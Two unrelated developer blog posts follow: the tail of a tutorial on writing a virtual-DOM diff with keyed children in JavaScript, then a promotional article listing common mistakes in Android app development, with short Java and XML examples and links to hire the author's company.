});
}
function hasTheKey(dom,key){
let keymatched=false;
for(let i=0;i<dom.children.length;i++){
if(key==dom.children[i].key) {
keymatched=true;
break};
}
return keymatched;
}
function patchKeys(vdom,dom){
//remove unmatched keys from dom
for(let i=0;i<dom.children.length;i++){
let dnode=dom.children[i];
let key=dnode.key;
if(key){
if(!hasTheKey(vdom,key)){
dnode.remove();
}
}
}
//adding keys to dom
for(let i=0;i<vdom.children.length;i++){
let vnode=vdom.children[i];
let key=vnode.key;
if(key){
if(!hasTheKey(dom,key)){
//if key is not present in dom then add it
let nthIndex=[].indexOf.call(vnode.parentNode.children, vnode);
if(dom.children[nthIndex]){
dom.children[nthIndex].before(vnode.cloneNode(true))
}else{
dom.append(vnode.cloneNode(true))
}
}
}
}
}
function diff(vdom, dom) {
//if dom has no childs then append the childs from vdom
if (dom.hasChildNodes() == false && vdom.hasChildNodes() == true) {
for (var i = 0; i < vdom.childNodes.length; i++) {
//appending
dom.append(vdom.childNodes[i].cloneNode(true));
}
} else {
patchKeys(vdom,dom);
//if dom has extra child
if (dom.childNodes.length > vdom.childNodes.length) {
let count = dom.childNodes.length - vdom.childNodes.length;
if (count > 0) {
for (; count > 0; count--) {
dom.childNodes[dom.childNodes.length - count].remove();
}
}
}
//now comparing all childs
for (var i = 0; i < vdom.childNodes.length; i++) {
//if the node is not present in dom append it
if (dom.childNodes[i] == undefined) {
dom.append(vdom.childNodes[i].cloneNode(true));
// console.log("appenidng",vdom.childNodes[i])
} else if (getnodeType(vdom.childNodes[i]) == getnodeType(dom.childNodes[i])) {
//if same node type
//if the nodeType is text
if (vdom.childNodes[i].nodeType == 3) {
//we check if the text content is not same
if (vdom.childNodes[i].textContent != dom.childNodes[i].textContent) {
//replace the text content
dom.childNodes[i].textContent = vdom.childNodes[i].textContent;
}
}else {
patchAttributes(vdom.childNodes[i], dom.childNodes[i])
}
} else {
//replace
dom.childNodes[i].replaceWith(vdom.childNodes[i].cloneNode(true));
}
if(vdom.childNodes[i].nodeType != 3){
diff(vdom.childNodes[i], dom.childNodes[i])
}
}
}
}
```
Let's see if it works.
```
|--------DOM---------|--------VDOM---------|---------action---------|
| <li key=1 val="1"> | <li key=1 val="1">  | None                   |
| <li key=2 val="2"> | <li key=3 val="3">  | Add this before key 2  |
|                    | <li key=2 val="2">  | None                   |
|--------------------|---------------------|------------------------|
```
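The key handling in the action table above can be sanity-checked with a plain-array sketch, no DOM involved (the helper name `patchKeysArray` is made up for illustration; it mirrors the remove-then-insert order of `patchKeys`):

```javascript
// Plain-array sketch of patchKeys: first remove keys missing from the
// new list, then insert new keys at the index they occupy in the new list.
function patchKeysArray(oldKeys, newKeys) {
  // drop keys that no longer exist in the new list
  let result = oldKeys.filter(k => newKeys.includes(k));
  // insert keys that are new, at their position in newKeys
  newKeys.forEach((k, i) => {
    if (!result.includes(k)) result.splice(i, 0, k);
  });
  return result;
}

console.log(patchKeysArray(['1', '2'], ['1', '3', '2'])); // → [ '1', '3', '2' ]
```

This matches the table: key `3` is inserted before key `2`, and the matching keys are left alone.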
```html
<div id="node">
<ul>
<li key="1">1</li>
<li key="2">2</li>
</ul>
</div>
<button>Diff</button>
<script>
let vdom = parseHTML(`
<ul>
<li key="1">1</li>
<li key="3">3</li>
<li key="2">2</li>
</ul>`);
let dom = document.getElementById('node');
clean(dom);
document.querySelector('button').addEventListener('click',function(){
diff(vdom,dom);
})
</script>
```
## The result

> If you are interested in this type of post, please check out my
> [blog](https://codegleam.in)

Author: joydeep-bhowmik
---
title: 10 Things to Consider While Android App Development!
published: true
description: To Take your startup or a mid-sized business to the next level, your products must provide the best...
canonical_url: https://dev.to/quokkalabs/10-things-to-consider-while-android-app-development-20g9
tags: android, mobile, github, api
---

To take your startup or a mid-sized business to the next level, your products must provide the best user experience. On the other hand, the marketing and mobile apps you provide should be good enough to attract new customers to your business. And all it takes is good Android app development to get there.
Now the question is: how do you make your Android app development good enough? The answer is to avoid common mistakes and keep some key points in mind while developing the app. All it takes is solid development work and a good Android app development company to make it worth it.

So, let's start this blog without wasting a single worthy second!!! But wait, before going ahead, if you want to save time and get super-fast results in your Android app development, [hire Android app developers](https://quokkalabs.com/hire-android-developer?utm_source=Dev.to&utm_medium=blog&utm_campaign=Hire) for your app now!
# 10 Things to Consider While Android App Development!
Let's start with the first but very critical point to consider.
## Memory Leaks in Android App Development
Memory leaks occur when an app allocates memory but fails to release it when it is no longer needed. This can result in a shortage of system memory, which can slow down the app or cause it to crash. To avoid memory leaks, Android app developers must ensure that objects are released when they are no longer needed and use tools such as the Android Memory Profiler and MAT (Memory Analyzer Tool) to identify and eliminate leaks.
If ignored, memory leaks can be costly for you; to be safe, you can contact an Android app development company or hire an Android developer for a particular project so they never happen again.
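One common JVM-side leak pattern is a long-lived static field pinning a short-lived object in memory. A minimal plain-Java sketch of the usual fix, holding a `WeakReference` so the garbage collector can reclaim the object (the class and field names below are illustrative, not Android APIs):

```java
import java.lang.ref.WeakReference;

public class LeakSketch {
    // BAD: a static strong reference would pin the object in memory forever:
    // static StringBuilder leaked;

    // BETTER: a weak reference lets the garbage collector reclaim the object
    // once no strong references to it remain.
    static WeakReference<StringBuilder> cached;

    public static void main(String[] args) {
        StringBuilder data = new StringBuilder("screen data");
        cached = new WeakReference<>(data);

        // While a strong reference ('data') exists, the weak ref resolves
        System.out.println(cached.get() != null); // true

        data = null; // drop the strong reference; the object is now collectable
        System.gc(); // a hint only -- collection timing is not guaranteed
    }
}
```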
Now let's see the next point!
## Not Optimizing App for Different Screen Sizes
Not optimizing the app for different screen sizes can result in UI elements being cut off, causing visual inconsistencies and affecting the user experience. To avoid this mistake, Android app developers must design the app's UI to be responsive and scalable, using `ConstraintLayout` and `RecyclerView` to accommodate different screen sizes and resolutions.
A good Android app development company always considers this for the best UX; even if you hire Android app developers from a good source, they consider it too.
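For instance, a layout built with `ConstraintLayout` can pin views to the parent's edges and use percentage-based sizing so it scales across screens. A hedged sketch (IDs, strings, and values below are illustrative):

```xml
<!-- Responsive layout sketch: the button stays centered and takes
     roughly 60% of the screen width on any device. -->
<androidx.constraintlayout.widget.ConstraintLayout
    xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    android:layout_width="match_parent"
    android:layout_height="match_parent">

    <Button
        android:id="@+id/submitButton"
        android:layout_width="0dp"
        android:layout_height="wrap_content"
        android:text="@string/submit"
        app:layout_constraintWidth_percent="0.6"
        app:layout_constraintStart_toStartOf="parent"
        app:layout_constraintEnd_toEndOf="parent"
        app:layout_constraintTop_toTopOf="parent"
        app:layout_constraintBottom_toBottomOf="parent" />

</androidx.constraintlayout.widget.ConstraintLayout>
```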
Now, let's see the following point!
## Not Following Design Guidelines (The Biggest Mistake in Android App Development)
Android has strict design guidelines that must be followed to ensure a consistent user experience. Not following the design guidelines can result in UI inconsistencies, causing users to feel confused and frustrated. To avoid this mistake, Android app developers must follow the Material Design guidelines and use appropriate color schemes, typography, and animations. You should contact a good Android app development company to get everything done bug-free.
Read More: {% embed https://medium.com/@quokkalabs135/what-is-material-design-why-to-use-material-design-58bfa97d2bf %}
Also, Read: {% embed https://dev.to/quokkalabs/material-design-3-all-you-need-to-know-about-the-googles-design-system-dp3 %}
## Ignoring App Permissions (Another Critical Mistake in Android App Development)
Ignoring app permissions can result in security issues and user privacy violations. Developers must ensure that the app asks for a permission only when required and explains to the user why it is needed. They must also ensure the app handles permission requests gracefully and responds appropriately to permission denials.
If you hire Android app developers, make sure they know the basic rules too!
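As a sketch, the manifest should declare only the permissions the app actually uses, and dangerous ones additionally have to be requested at runtime with an explanation (snippet is illustrative):

```xml
<!-- Declare only what the app really needs. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android">

    <!-- Normal permission: granted automatically at install time -->
    <uses-permission android:name="android.permission.INTERNET" />

    <!-- Dangerous permission: must ALSO be requested at runtime,
         with a clear explanation of why it is needed -->
    <uses-permission android:name="android.permission.CAMERA" />
</manifest>
```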
## Not Handling Network Connectivity Issues
Not handling network connectivity issues can result in the app becoming unresponsive or crashing. Android app developers must handle network connectivity issues, such as network errors, timeouts, and connectivity loss, using appropriate error messages and retry mechanisms. They must also ensure the app does not block the UI thread while waiting for network responses.
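A retry mechanism with exponential backoff can be sketched in plain Java; the `withRetry` helper and the fake "network call" below are illustrative stand-ins, not Android APIs:

```java
import java.util.concurrent.Callable;

public class RetrySketch {
    // Retry a flaky operation up to maxAttempts times, doubling the
    // delay between attempts (exponential backoff).
    static <T> T withRetry(Callable<T> op, int maxAttempts, long baseDelayMs)
            throws Exception {
        Exception last = null;
        long delay = baseDelayMs;
        for (int attempt = 1; attempt <= maxAttempts; attempt++) {
            try {
                return op.call();
            } catch (Exception e) {
                last = e;
                if (attempt < maxAttempts) {
                    Thread.sleep(delay);
                    delay *= 2;
                }
            }
        }
        throw last; // all attempts failed: surface the last error
    }

    public static void main(String[] args) throws Exception {
        final int[] calls = {0};
        // A stand-in "network call" that fails twice, then succeeds
        String result = withRetry(() -> {
            if (++calls[0] < 3) throw new RuntimeException("timeout");
            return "ok";
        }, 5, 10);
        System.out.println(result + " after " + calls[0] + " attempts");
    }
}
```

On Android, the retried call would run off the main thread (see the threading point below in the article) so the UI never blocks while waiting.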
## Not Following MVC or MVP Architecture
Not following MVC (Model-View-Controller) or MVP (Model-View-Presenter) architecture can result in unmanageable, hard-to-maintain code that leads to development issues in the future. Developers must choose the appropriate architecture based on the app's requirements and follow best practices, such as separating business logic and UI concerns and avoiding tight coupling.
## Hard-Coding Values in Android App Development
Hard-coding values can result in inflexible code that is hard to modify and maintain. Developers must avoid hard-coding values such as strings, colors, and layout dimensions, and use appropriate resources instead. Android app developers must also ensure that the app's resources are externalized and can be easily modified.
Hire Android app developers from good sources to avoid such problems quickly!
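For example, instead of hard-coding user-facing text and colors in code or layouts, they belong in a resource file under `res/values/` and are referenced by name (`@string/submit`, `@color/brand_primary`); the names and values below are illustrative:

```xml
<!-- res/values/ resource file: externalized, easy to change or translate -->
<resources>
    <string name="app_name">My App</string>
    <string name="submit">Submit</string>
    <color name="brand_primary">#6200EE</color>
</resources>
```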
## Not Testing the App Thoroughly – The Major Mistake in Android App Development
Not testing the app thoroughly can result in bugs, crashes, and usability issues that frustrate users. Developers must thoroughly test the app, including unit, integration, and UI testing. Android app developers must also test the app on various devices, screen sizes, and OS versions and use tools such as Espresso and Appium to automate testing.
Also, developers must ensure that the app is accessible to users with disabilities and meets the target audience's requirements.
## Not Handling Configuration Changes
Not handling configuration changes can result in an app that crashes when the device orientation changes or the keyboard is opened. To solve this, configuration changes such as orientation changes, keyboard visibility, and language changes must be handled properly so that the app remains stable and responsive.
## Not Using Appropriate Data Structures
Not using appropriate data structures can result in slow, inefficient code that affects the app's performance. Android app developers must choose appropriate data structures such as `ArrayList`, `HashMap`, and `LinkedList` based on the app's requirements and use them wisely to optimize performance.
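The trade-off is easy to demonstrate in plain Java: an `ArrayList` gives fast indexed access and iteration, while a `HashMap` gives fast lookup by key, so the right choice depends on the access pattern (the example data here is made up):

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class DataStructureSketch {
    public static void main(String[] args) {
        // ArrayList: fast indexed access and ordered iteration
        List<String> recentItems = new ArrayList<>();
        recentItems.add("photo.png");
        recentItems.add("video.mp4");
        System.out.println(recentItems.get(0)); // indexed read: O(1)

        // HashMap: fast lookup by key -- e.g. caching items by id,
        // instead of scanning a list (O(n)) on every lookup
        Map<String, String> cache = new HashMap<>();
        cache.put("42", "photo.png");
        System.out.println(cache.get("42")); // keyed read: O(1) on average
    }
}
```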
## Few Other Technical Things to Watch Out for While Android App Development
So, these were the most commonly occurring errors in Android app development. But it's not the end of the blog; I have collected some more mistakes that have happened to me and can be helpful to you! So, let's look at those errors as fast as possible.
### Not Using the Latest APIs and SDKs
Not using the latest APIs and SDKs can result in an incompatible app with the latest Android OS versions and devices.
### Not Handling Memory Efficiently
Not handling memory efficiently can result in an app that consumes too much memory and affects the app's performance.
### Not Using Proper Threading Techniques
Not using proper threading techniques can result in an unresponsive, slow, and unstable app.
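The core idea, offloading slow work to a background thread so the main thread stays responsive, can be sketched in plain Java with an `ExecutorService` (on Android you would additionally post the result back to the main thread, e.g. via a `Handler`; the sleep below just simulates slow work):

```java
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;

public class ThreadingSketch {
    public static void main(String[] args) throws Exception {
        ExecutorService background = Executors.newSingleThreadExecutor();

        // Run the slow work off the main thread...
        Future<String> result = background.submit(() -> {
            Thread.sleep(50); // simulate a slow disk/network operation
            return "loaded";
        });

        // ...so the main thread stays free until the result is needed
        System.out.println("UI stays responsive");
        System.out.println(result.get()); // blocks only here, when required

        background.shutdown();
    }
}
```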
### Not Considering Internationalization
Not considering internationalization can result in an app that is not accessible to users from different countries and cultures.
## Some FAQs That May Help You!
### How To Build an Android App?
In short, to build an Android app, you should first define and design your app idea using tools like Sketch or Figma. Then, choose your development environment, like Android Studio, and set it up by installing the Android SDK. Finally, start coding and testing your app, and publish it on the Google Play Store once it's ready.
### How To Build an Android App for Beginners?
To build an Android app for beginners, you should first learn Java or Kotlin, the two main programming languages for Android app development. Then, you can use Android Studio, the official IDE for Android app development, to create your app's user interface and start coding. Finally, test your app and publish it on the Google Play Store.
### Which 5 Things That Make a Good App?
A good app can be a game-changer for the user and the developer. To make a good app, there are several factors to consider. Here are five things that can make a good app:
- User Interface (UI) Design
- Performance
- Functionality
- Security
- Support
## Final Words
Mastering Android app development requires careful consideration of key factors that pave the way for success. Developers can ensure their apps stand out in the competitive market by understanding the importance of thorough planning, user-centric design, efficient coding practices, and staying up to date with the latest Android trends. Leveraging the power of cloud technologies, optimizing app performance, prioritizing security and privacy, and embracing continuous improvement through user feedback and analytics are also essential for delivering high-quality Android applications.
Remember, becoming a proficient Android app developer is a continuous learning process. By implementing these ten key factors and continuously honing your skills, you'll be well on your way to creating remarkable Android apps that captivate users, drive engagement, and achieve long-term success in the dynamic world of mobile app development. So, embrace the challenge, stay curious, and keep pushing the boundaries of what's possible in the exciting realm of [Android app development](https://quokkalabs.com/?utm_source=Dev.to&utm_medium=blog&utm_campaign=Home)!
Wasting time thinking means increasing competitors in the market!
Thanks for reading!
Author: labsquokka